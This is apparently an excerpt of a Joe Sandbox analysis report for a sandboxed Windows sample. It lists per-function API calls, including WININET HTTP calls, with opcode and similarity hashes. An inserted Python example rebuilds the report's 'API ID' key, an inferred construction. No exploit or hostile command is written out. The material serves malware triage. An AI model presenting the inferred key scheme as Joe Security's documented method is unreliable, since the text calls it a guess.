• MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 005966C0
• GetDlgItem.USER32(?,000003EA), ref: 005966D3
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 005966E9
• InvalidateRect.USER32(?,00000000,00000001), ref: 005966F6
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
APIs
  • Part of subcall function 00532441: GetWindowLongW.USER32(00000000,000000EB), ref: 00532452
• GetSystemMetrics.USER32(0000000F), ref: 005CA926
• GetSystemMetrics.USER32(0000000F), ref: 005CA946
• MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 005CAB83
• SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 005CABA1
• SendMessageW.USER32(00000003,00000469,?,00000000), ref: 005CABC2
• ShowWindow.USER32(00000003,00000000), ref: 005CABE1
• InvalidateRect.USER32(?,00000000,00000001), ref: 005CAC06
• DefDlgProcW.USER32(?,00000005,?,?), ref: 005CAC29
Strings
Similarity
• API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
• String ID: $Hb
• API String ID: 1211466189-1131636505
APIs
• CreateMenu.USER32 ref: 005C45D8
• SetMenu.USER32(?,00000000), ref: 005C45E7
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005C466F
• IsMenu.USER32(?), ref: 005C4683
• CreatePopupMenu.USER32 ref: 005C468D
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 005C46BA
• DrawMenuBar.USER32 ref: 005C46C2
Strings
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup
• String ID: 0$F$Hb
• API String ID: 161812096-2206038376
                                                                                                                                                      • Opcode ID: ba0924bb75b4fa7130b0714811019d2fc729906439ade4803c15d54a270eb1d5
                                                                                                                                                      • Instruction ID: eac5d23164ce01cb2e962f3bd78e9e5d5177ab0b2f35979a03a4f1d6af11aec8
                                                                                                                                                      • Opcode Fuzzy Hash: ba0924bb75b4fa7130b0714811019d2fc729906439ade4803c15d54a270eb1d5
                                                                                                                                                      • Instruction Fuzzy Hash: 8D414AB5601219AFDB14CFA4D868FAA7BB5FF4A314F14002CFA4597350C735A964DF60
                                                                                                                                                      APIs
                                                                                                                                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 005C499A
                                                                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 005C49A1
                                                                                                                                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 005C49B4
                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 005C49BC
                                                                                                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 005C49C7
                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 005C49D1
                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 005C49DB
                                                                                                                                                      • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 005C49F1
                                                                                                                                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 005C49FD
                                                                                                                                                      Strings
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                      • String ID: static
                                                                                                                                                      • API String ID: 2559357485-2160076837
                                                                                                                                                      • Opcode ID: 1d245dabd42634e6b8f5c99114934ed5c4e9d76fe8399d422ea67e4525c3b466
                                                                                                                                                      • Instruction ID: f940644ab8cac8c0bbf30de2a79ca2ef98cc93d1fe81450bc739083eaddf8c3d
                                                                                                                                                      • Opcode Fuzzy Hash: 1d245dabd42634e6b8f5c99114934ed5c4e9d76fe8399d422ea67e4525c3b466
                                                                                                                                                      • Instruction Fuzzy Hash: AE313A32100619AFDF119FA4DC08FEA3FA9FF19724F110229FA55E60A0D735D815EB64
                                                                                                                                                      APIs
                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 005B45B9
                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 005B45E7
                                                                                                                                                      • CoUninitialize.OLE32 ref: 005B45F1
                                                                                                                                                      • _wcslen.LIBCMT ref: 005B468A
                                                                                                                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 005B470E
                                                                                                                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 005B4832
                                                                                                                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 005B486B
                                                                                                                                                      • CoGetObject.OLE32(?,00000000,005D0B64,?), ref: 005B488A
                                                                                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 005B489D
                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 005B4921
                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 005B4935
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 429561992-0
                                                                                                                                                      • Opcode ID: b69171f1618c6fd10de34702c568f96cadfed1460c25e03e9d70b4eba98e13ff
                                                                                                                                                      • Instruction ID: 9c394f5d9e0d5a2d1846f38a46b49458794467bae3a8ee93a8df6f191856b622
                                                                                                                                                      • Opcode Fuzzy Hash: b69171f1618c6fd10de34702c568f96cadfed1460c25e03e9d70b4eba98e13ff
                                                                                                                                                      • Instruction Fuzzy Hash: 24C12371608305AFD710DF68C8849ABBBE9FF89748F14491DF98A9B251DB30ED06CB52
                                                                                                                                                      APIs
                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 005A844D
                                                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 005A84E9
                                                                                                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 005A84FD
                                                                                                                                                      • CoCreateInstance.OLE32(005D0CD4,00000000,00000001,005F7E8C,?), ref: 005A8549
                                                                                                                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 005A85CE
                                                                                                                                                      • CoTaskMemFree.OLE32(?,?), ref: 005A8626
                                                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 005A86B1
                                                                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 005A86D4
                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 005A86DB
                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 005A8730
                                                                                                                                                      • CoUninitialize.OLE32 ref: 005A8736
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2762341140-0
                                                                                                                                                      • Opcode ID: 1894729b516d61158580f1816c236104ff294d5d1d6aa849a185385da8bb611b
                                                                                                                                                      • Instruction ID: 799580893f6013393c25206e550047bafdc15b88bcc1ae4c6fa32a17ca046e66
                                                                                                                                                      • Opcode Fuzzy Hash: 1894729b516d61158580f1816c236104ff294d5d1d6aa849a185385da8bb611b
                                                                                                                                                      • Instruction Fuzzy Hash: 97C10C75A00609AFDB14DFA4C888DAEBBF5FF49304B1484A8F519EB261DB31ED45CB50
                                                                                                                                                      APIs
                                                                                                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0059033F
                                                                                                                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00590398
                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 005903AA
                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 005903CA
                                                                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 0059041D
                                                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00590431
                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00590446
                                                                                                                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00590453
                                                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0059045C
                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0059046E
                                                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00590479
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2706829360-0
                                                                                                                                                      • Opcode ID: f1e548f54091a5badb66fb416b379b9193f773f91771c49aa827ea198a1060b6
                                                                                                                                                      • Instruction ID: 0b0c4b0ac4b4d794bc7f86e108c951c50889cf3f018a8b49f3270ddcfa618c0f
                                                                                                                                                      • Opcode Fuzzy Hash: f1e548f54091a5badb66fb416b379b9193f773f91771c49aa827ea198a1060b6
                                                                                                                                                      • Instruction Fuzzy Hash: 63416375A00219DFCF04DF64C888DAEBFB9FF58344F008429EA59E72A1D770A945DBA0
                                                                                                                                                      APIs
                                                                                                                                                      • GetLocalTime.KERNEL32(?), ref: 005A8BB1
                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 005A8BC1
                                                                                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 005A8BCD
                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 005A8C6A
                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 005A8C7E
                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 005A8CB0
                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 005A8CE6
                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 005A8CEF
                                                                                                                                                      Strings
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                      • String ID: *.*
                                                                                                                                                      • API String ID: 1464919966-438819550
                                                                                                                                                      • Opcode ID: 989b6d1a395d8c265e759b29ec76870e4502feacca76b5d47c7ea1806a455854
                                                                                                                                                      • Instruction ID: 44d8cd8f59901c21e5676e6fc97c56921f6cf2d4170a60d1ae10a370514091a8
                                                                                                                                                      • Opcode Fuzzy Hash: 989b6d1a395d8c265e759b29ec76870e4502feacca76b5d47c7ea1806a455854
                                                                                                                                                      • Instruction Fuzzy Hash: BB614CB25047069FC710EF60C8499AEBBE8FF89310F04481DF989D7251DB35E945CB62
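Added example, not code from the Joe Sandbox report or from Joe Security: a small parser for the per-function API listings above that rebuilds the "API ID" field shown in each Similarity block, so the key can be recomputed for functions in other dumps and used as a pivot. The construction is inferred from the entries on this page and is an assumption, not vendor documentation: each API name is split into CamelCase tokens, tokens shorter than four characters are dropped (Get, Set, Co, SH, Ex, W, DC, To, Mem, ID), tokens are counted over every call in the function including repeats, groups of equal count are joined in descending order with "$", and each group is written in ASCII order. The names parse_call, split_blocks, api_tokens, api_id and summarize, the four-character threshold and the SAMPLE input (two listings copied from the text above) are this example's own; the numeric "API String ID" hash is not reconstructed.

```python
"""Rebuild the Joe Sandbox 'API ID' similarity key from a function's API listing.

Added example; the key construction is inferred from the listings on this
page (an assumption, not vendor documentation).
"""
import re
from collections import Counter

# One call line: "• Name.MODULE(args), ref: 005C499A". Parentheses and comma
# are absent when the call has no arguments ("CoUninitialize.OLE32 ref: ...").
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# CamelCase splitter: all-caps run (SH, DC, ID, W), capitalised word, or a
# lowercase/underscore run such as _wcslen.
TOKEN = re.compile(r"[A-Z]+(?![a-z])|[A-Z][a-z]+|[a-z_]+")
MIN_TOKEN_LEN = 4  # inferred from the page: no shorter token appears in any API ID


def parse_call(line):
    """Return {'name', 'module', 'args', 'ref'} for an API line, else None."""
    m = API_LINE.match(line)
    if not m:
        return None
    call = m.groupdict()
    call["args"] = call["args"] or ""
    return call


def split_blocks(text):
    """Group calls per function: an 'APIs' header opens a block; the next
    'Strings' or 'Memory Dump Source' header closes it."""
    blocks, current = [], None
    for line in text.splitlines():
        header = line.strip()
        if header == "APIs":
            current = []
            blocks.append(current)
        elif header in ("Strings", "Memory Dump Source"):
            current = None
        elif current is not None:
            call = parse_call(line)
            if call:
                current.append(call)
    return blocks


def api_tokens(name):
    """Tokens of one API name that are long enough to count."""
    return [t for t in TOKEN.findall(name) if len(t) >= MIN_TOKEN_LEN]


def api_id(names):
    """API ID key for one function; repeated calls count every time."""
    counts = Counter(t for n in names for t in api_tokens(n))
    tiers = {}
    for tok, c in counts.items():
        tiers.setdefault(c, []).append(tok)
    return "$".join("".join(sorted(tiers[c])) for c in sorted(tiers, reverse=True))


def summarize(text):
    """(api_id, first ref, sorted modules) per function block in the text."""
    return [
        (api_id([c["name"] for c in b]), b[0]["ref"], sorted({c["module"] for c in b}))
        for b in split_blocks(text) if b
    ]


# Two listings copied from the report text above; constructed test input for
# this example (the page carries more functions in the same format).
SAMPLE = """\
APIs
• MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 005C499A
• CreateCompatibleDC.GDI32(00000000), ref: 005C49A1
• SendMessageW.USER32(?,00000173,00000000,00000000), ref: 005C49B4
• SelectObject.GDI32(00000000,00000000), ref: 005C49BC
• GetPixel.GDI32(00000000,00000000,00000000), ref: 005C49C7
• DeleteDC.GDI32(00000000), ref: 005C49D1
• GetWindowLongW.USER32(?,000000EC), ref: 005C49DB
• SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 005C49F1
• DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 005C49FD
Strings
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
APIs
• VariantInit.OLEAUT32(?), ref: 005B45B9
• CoInitialize.OLE32(00000000), ref: 005B45E7
• CoUninitialize.OLE32 ref: 005B45F1
• _wcslen.LIBCMT ref: 005B468A
• GetRunningObjectTable.OLE32(00000000,?), ref: 005B470E
• SetErrorMode.KERNEL32(00000001,00000029), ref: 005B4832
• CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 005B486B
• CoGetObject.OLE32(?,00000000,005D0B64,?), ref: 005B488A
• SetErrorMode.KERNEL32(00000000), ref: 005B489D
• SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 005B4921
• VariantClear.OLEAUT32(?), ref: 005B4935
Memory Dump Source
"""

if __name__ == "__main__":
    for key, ref, modules in summarize(SAMPLE):
        print(f"{ref}  {key}  {modules}")
```

The key depends only on the mix of API names, not on addresses or on the argument values, so it survives rebuilds of the same code at a different base; it is coarser than the opcode and instruction fuzzy hashes above and is best used to shortlist candidate functions before comparing those. Because the short prefixes and suffixes are dropped, an A and a W variant of the same API, or a Get and a Set pair, collapse to the same tokens.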
APIs
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0059C5D9
• IsMenu.USER32(00000000), ref: 0059C5F9
• CreatePopupMenu.USER32 ref: 0059C62F
• GetMenuItemCount.USER32(pb), ref: 0059C680
• InsertMenuItemW.USER32(pb,?,00000001,00000030), ref: 0059C6A8
Strings
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup
• String ID: 0$2$pb$pb
• API String ID: 93392585-3013000517
• Opcode ID: afc30364c4d19150e7f75b448a71ed7b08173816c22e837d0602ce8112c783e7
• Instruction ID: f604227849df97f2fb9f586084f9f48ce012c01bc57e39f2b8b3fc5131104025
• Opcode Fuzzy Hash: afc30364c4d19150e7f75b448a71ed7b08173816c22e837d0602ce8112c783e7
• Instruction Fuzzy Hash: AB519B71A00205ABDF20CF6CC988BAEBFF9BF58314F245569E911DB2A1E7709944CB61
APIs
  • Part of subcall function 0053B25F: _wcslen.LIBCMT ref: 0053B269
  • Part of subcall function 00594536: GetClassNameW.USER32(?,?,000000FF), ref: 00594559
• SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 005927F4
• GetDlgCtrlID.USER32 ref: 005927FF
• GetParent.USER32 ref: 0059281B
• SendMessageW.USER32(00000000,?,00000111,?), ref: 0059281E
• GetDlgCtrlID.USER32(?), ref: 00592827
• GetParent.USER32(?), ref: 0059283B
• SendMessageW.USER32(00000000,?,00000111,?), ref: 0059283E
Strings
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: MessageSend$CtrlParent$ClassName_wcslen
• String ID: ComboBox$ListBox
• API String ID: 711023334-1403004172
• Opcode ID: 1bb551b8d4541947edacba5de267deacf1bcec2a51a7225f91722d9bd7ddf4fc
• Instruction ID: bc5cec2a0acf2be9b943e4ea3202eab9932eaf7cde96bbfdee2751011dca86ee
• Opcode Fuzzy Hash: 1bb551b8d4541947edacba5de267deacf1bcec2a51a7225f91722d9bd7ddf4fc
• Instruction Fuzzy Hash: 6C21BE74900219BFCF15ABA0CC89EEEBFB9FF55310F000516BA51A72A2CB794809DB60
APIs
  • Part of subcall function 0053B25F: _wcslen.LIBCMT ref: 0053B269
  • Part of subcall function 00594536: GetClassNameW.USER32(?,?,000000FF), ref: 00594559
• SendMessageW.USER32(?,00000186,00020000,00000000), ref: 005928D3
• GetDlgCtrlID.USER32 ref: 005928DE
• GetParent.USER32 ref: 005928FA
• SendMessageW.USER32(00000000,?,00000111,?), ref: 005928FD
• GetDlgCtrlID.USER32(?), ref: 00592906
• GetParent.USER32(?), ref: 0059291A
• SendMessageW.USER32(00000000,?,00000111,?), ref: 0059291D
Strings
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: MessageSend$CtrlParent$ClassName_wcslen
• String ID: ComboBox$ListBox
• API String ID: 711023334-1403004172
• Opcode ID: a370af27d353c8322d5551cbbd6aeb88fda5235ab7706a7164fd1e561ff76bd6
• Instruction ID: 9f2f1fa7bdcc82c22c24aa17d5a9743a25bed533d6dc0c2ae14836e5e6d97a3b
• Opcode Fuzzy Hash: a370af27d353c8322d5551cbbd6aeb88fda5235ab7706a7164fd1e561ff76bd6
• Instruction Fuzzy Hash: E521BE75900218BBDF11ABA0DC89EFEBFB8FF14300F004416BA51A72A5DB794849DB60
APIs
• IsWindow.USER32(00000000), ref: 005C8896
• IsWindowEnabled.USER32(00000000), ref: 005C88A2
• SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 005C897D
• SendMessageW.USER32(00000000,000000B0,?,?), ref: 005C89B0
• IsDlgButtonChecked.USER32(?,00000000), ref: 005C89E8
• GetWindowLongW.USER32(00000000,000000EC), ref: 005C8A0A
• SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 005C8A22
Strings
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: MessageSendWindow$ButtonCheckedEnabledLong
• String ID: Hb
• API String ID: 4072528602-1270690246
• Opcode ID: dce462db65ab4c98af0f1890058d30c33216f70be5bd9a1f1e2789e991dbc24f
• Instruction ID: 5821af90f05635373bcfcc640c9106bdf22760b2247a4cd672890b765335d070
• Opcode Fuzzy Hash: dce462db65ab4c98af0f1890058d30c33216f70be5bd9a1f1e2789e991dbc24f
• Instruction Fuzzy Hash: E271BA34604205AFEF259F95C898FBABFB9FF4A310F14486DE84593261CB31AD85DB11
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 005ACBCF
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005ACBF7
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 005ACC27
• GetLastError.KERNEL32 ref: 005ACC7F
• SetEvent.KERNEL32(?), ref: 005ACC93
• InternetCloseHandle.WININET(00000000), ref: 005ACC9E
Strings
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
• String ID:
• API String ID: 3113390036-3916222277
• Opcode ID: 454c190590df279d7343f8154813d9b1ca4f269e19c46d06c17e037e2d063b08
• Instruction ID: 2ae88db0059c8972f6e4f301067f627e76a0aabab673d5a157587ebbbe462371
• Opcode Fuzzy Hash: 454c190590df279d7343f8154813d9b1ca4f269e19c46d06c17e037e2d063b08
• Instruction Fuzzy Hash: 1E317AB5500608AFD7219F658998AAF7FFCFB5A754B10092EE45AD6200DB34DD089BB0
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00575437,?,?,Bad directive syntax error,005CDCD0,00000000,00000010,?,?), ref: 0059A14B
• LoadStringW.USER32(00000000,?,00575437,?), ref: 0059A152
  • Part of subcall function 0053B25F: _wcslen.LIBCMT ref: 0053B269
• MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0059A216
Strings
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: HandleLoadMessageModuleString_wcslen
• String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
• API String ID: 858772685-4153970271
• Opcode ID: 597d7f02c49c00976bd398586c205f7a2a3151e2220f149140d2bbe9990052dd
• Instruction ID: 82368fd84d9e9abbf08420fbf1a96b5818be3674de5d5b48d6c33b2c36dbf440
• Opcode Fuzzy Hash: 597d7f02c49c00976bd398586c205f7a2a3151e2220f149140d2bbe9990052dd
• Instruction Fuzzy Hash: 3F215E3180021EBFDF16AF90CC0AEEE7F79BF58304F044465F615660A2DB759A18EB61
APIs
• GetParent.USER32 ref: 0059293B
• GetClassNameW.USER32(00000000,?,00000100), ref: 00592950
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 005929DD
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: ClassMessageNameParentSend
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 1290815626-3381328864
• Opcode ID: 302f4cd874edd789d48b0402936a091d633ae6eaa2404331e92e468cf6f4c510
• Instruction ID: 7067c146698a27e22abe78effdda05e590a24e73581a0a2863d9f4c24b6393e0
• Opcode Fuzzy Hash: 302f4cd874edd789d48b0402936a091d633ae6eaa2404331e92e468cf6f4c510
• Instruction Fuzzy Hash: 13119E7628870BBAEF002620AC1ADB67FACBB15724F200027FA01E50D1EA6668C55A54
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 005ACADF
• GetLastError.KERNEL32 ref: 005ACAF2
• SetEvent.KERNEL32(?), ref: 005ACB06
  • Part of subcall function 005ACBB0: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 005ACBCF
  • Part of subcall function 005ACBB0: GetLastError.KERNEL32 ref: 005ACC7F
  • Part of subcall function 005ACBB0: SetEvent.KERNEL32(?), ref: 005ACC93
  • Part of subcall function 005ACBB0: InternetCloseHandle.WININET(00000000), ref: 005ACC9E
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
• String ID:
• API String ID: 337547030-0
• Opcode ID: 00bb0f043988fdc5c809a5a2aec8a8d5efb9d8768db209091415e612411118c7
• Instruction ID: 817038e4b6141eac4ae893b430c4f945a984709120f8a1ce12130435c9c3330d
• Opcode Fuzzy Hash: 00bb0f043988fdc5c809a5a2aec8a8d5efb9d8768db209091415e612411118c7
• Instruction Fuzzy Hash: C1317A75200A09AFDB219F65DD49A6ABFF8FF5A300B40482DF856C6610D736E815EBB0
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00591CD9,?,?,00000000), ref: 0059209C
• HeapAlloc.KERNEL32(00000000,?,00591CD9,?,?,00000000), ref: 005920A3
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00591CD9,?,?,00000000), ref: 005920B8
• GetCurrentProcess.KERNEL32(?,00000000,?,00591CD9,?,?,00000000), ref: 005920C0
• DuplicateHandle.KERNEL32(00000000,?,00591CD9,?,?,00000000), ref: 005920C3
